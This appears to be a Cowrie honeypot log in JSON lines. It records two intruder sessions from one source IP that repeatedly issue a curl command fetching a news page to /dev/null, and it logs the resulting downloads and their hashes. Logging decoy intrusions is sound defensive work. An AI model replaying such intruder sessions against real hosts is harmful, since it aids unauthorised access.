{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.784010Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.807185Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.807976Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.811224Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.816097Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.822768Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.825385Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.826746Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.829337Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.843609Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.844535Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.863266Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.864758Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.865893Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.893929Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.896311Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.898106Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.899298Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.904715Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.907079Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.910134Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.929060Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.929969Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.937587Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.939547Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.947443Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.948102Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.967038Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.967803Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:23.984345Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:23.985110Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.007258Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.008097Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.024594Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.025436Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.047456Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.048352Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.060148Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.061467Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.094764Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.095728Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.100156Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.109720Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.111559Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.112867Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.139430Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.142891Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.143803Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.156162Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.157396Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.158872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.177644Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.187484Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.188244Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.190773Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.192838Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.196163Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.197748Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.198769Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.209835Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.225298Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.226164Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.236325Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.237146Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.240976Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.265324Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.266273Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.270963Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.272122Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.307380Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.308312Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.312113Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.312816Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.357219Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.358221Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.361783Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.362891Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.363702Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.393076Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.395330Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.396436Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:24.399405Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.400614Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.408113Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.415456Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:24.419152Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
